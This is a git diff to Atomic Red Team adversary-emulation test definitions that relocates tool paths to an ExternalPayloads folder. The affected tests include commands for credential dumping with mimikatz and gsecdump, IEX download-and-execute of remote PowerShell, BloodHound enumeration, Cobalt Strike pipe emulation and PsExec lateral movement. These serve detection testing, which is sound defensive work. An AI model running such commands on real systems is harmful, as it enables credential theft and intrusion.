diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index d9121d50..6402656b 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -19,7 +19,7 @@ atomic_tests: gsecdump_exe: description: Path to the Gsecdump executable type: path - default: PathToAtomicsFolder\T1003\bin\gsecdump.exe + default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe gsecdump_bin_hash: description: File hash of the Gsecdump binary file type: string diff --git a/atomics/T1049/T1049.yaml b/atomics/T1049/T1049.yaml index f1b647be..e627d7cf 100644 --- a/atomics/T1049/T1049.yaml +++ b/atomics/T1049/T1049.yaml @@ -66,7 +66,7 @@ atomic_tests: SharpView: description: Path of the executable opensource redteam tool used for the performing this atomic. type: path - default: PathToAtomicsFolder\T1049\bin\SharpView.exe + default: PathToAtomicsFolder\..\ExternalPayloads\SharpView.exe syntax: description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. type: string diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 289d982d..90427407 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -25,23 +25,18 @@ atomic_tests: Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. supported_platforms: - windows - input_arguments: - file_path: - description: File path for SharpHound payload - type: string - default: PathToAtomicsFolder\T1059.001\src dependency_executor_name: powershell dependencies: - description: | - SharpHound.ps1 must be located at #{file_path} + SharpHound.ps1 must be located at "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" prereq_command: | - if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" executor: command: | - write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan - import-module #{file_path}\SharpHound.ps1 + import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" Invoke-BloodHound -OutputDirectory $env:Temp Start-Sleep 5 cleanup_command: | diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 8021e38b..46f9de59 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -593,6 +593,7 @@ atomic_tests: prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line." executor: @@ -774,13 +775,9 @@ atomic_tests: description: Destination path to file type: path default: $env:TEMP\Atomic-license.txt - local_nimgrab: - description: Local path to nimgrab - type: path - default: PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe executor: command: | - cmd /c nimgrab.exe #{remote_file} #{destination_path} + cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path} cleanup_command: | del #{destination_path} >nul 2>&1 name: command_prompt @@ -789,13 +786,12 @@ atomic_tests: - description: | NimGrab must be installed on system. prereq_command: | - if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\nim.zip Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\nim.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\nim -Force - Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab} - Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim - Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim.zip + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" - name: iwr or Invoke Web-Request download auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279 description: | diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index e52ca500..29378d13 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -154,7 +154,7 @@ atomic_tests: renamed_binary: description: renamed Microsoft.Workflow.Compiler type: path - default: PathToAtomicsFolder\T1218\src\svchost.exe + default: PathToAtomicsFolder\..\ExternalPayloads\svchost.exe mwcpath: description: Default location of Microsoft.Workflow.Compiler.exe type: path @@ -168,10 +168,10 @@ atomic_tests: - description: | .Net must be installed for this test to work correctly. prereq_command: | - Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} get_prereq_command: | - write-host "you need to rename workflow complier before you run this test" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force executor: command: | #{renamed_binary} #{xml_payload} output.txt diff --git a/atomics/T1220/T1220.yaml b/atomics/T1220/T1220.yaml index 18e8357c..24508374 100644 --- a/atomics/T1220/T1220.yaml +++ b/atomics/T1220/T1220.yaml @@ -22,7 +22,7 @@ atomic_tests: msxsl_exe: description: Location of the MSXSL executable. type: path - default: PathToAtomicsFolder\T1220\bin\msxsl.exe + default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe dependency_executor_name: powershell dependencies: - description: | @@ -44,6 +44,7 @@ atomic_tests: prereq_command: | if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" executor: command: | @@ -72,7 +73,7 @@ atomic_tests: msxsl_exe: description: Location of the MSXSL executable. type: path - default: PathToAtomicsFolder\T1220\bin\msxsl.exe + default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml index b98ced22..0288f014 100644 --- a/atomics/T1552.004/T1552.004.yaml +++ b/atomics/T1552.004/T1552.004.yaml @@ -290,7 +290,7 @@ atomic_tests: mimikatz_exe: description: Path of the Mimikatz binary type: string - default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe + default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1552.006/T1552.006.yaml b/atomics/T1552.006/T1552.006.yaml index 372d33d4..f5908e7f 100644 --- a/atomics/T1552.006/T1552.006.yaml +++ b/atomics/T1552.006/T1552.006.yaml @@ -38,7 +38,7 @@ atomic_tests: gpp_script_path: description: Path to the Get-GPPPassword PowerShell Script type: path - default: PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1 + default: PathToAtomicsFolder\..\ExternalPayloads\Get-GPPPassword.ps1 dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1559/T1559.yaml b/atomics/T1559/T1559.yaml index a27c1b54..86962eaa 100644 --- a/atomics/T1559/T1559.yaml +++ b/atomics/T1559/T1559.yaml @@ -15,15 +15,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 1 name: command_prompt - name: Cobalt Strike Lateral Movement (psexec_psh) pipe @@ -39,15 +39,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 2 name: command_prompt - name: Cobalt Strike SSH (postex_ssh) pipe @@ -63,15 +63,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 3 name: command_prompt - name: Cobalt Strike post-exploitation pipe (4.2 and later) @@ -87,15 +87,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 4 name: command_prompt - name: Cobalt Strike post-exploitation pipe (before 4.2) @@ -111,13 +111,13 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 5 name: command_prompt diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml index 170e79d6..c06ea1a7 100644 --- a/atomics/T1569.002/T1569.002.yaml +++ b/atomics/T1569.002/T1569.002.yaml @@ -119,13 +119,23 @@ atomic_tests: description: Target hostname to attempt psexec connection to for emulation of lateral movement. type: string default: $ENV:COMPUTERNAME + dependencies: + - description: | + PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" + prereq_command: | + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force + New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") -Force | Out-Null + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force executor: command: | cmd.exe /c "wmic csproduct get UUID" cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1" cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1" reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f - copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp + copy "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" $env:temp cmd.exe /c "$env:temp\psexec.exe -accepteula \\#{targethost} cmd.exe /c echo "--access-token"" cleanup_command: | reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /f diff --git a/atomics/T1569.002/bin/PsExec.exe b/atomics/T1569.002/bin/PsExec.exe deleted file mode 100644 index 610baee0..00000000 Binary files a/atomics/T1569.002/bin/PsExec.exe and /dev/null differ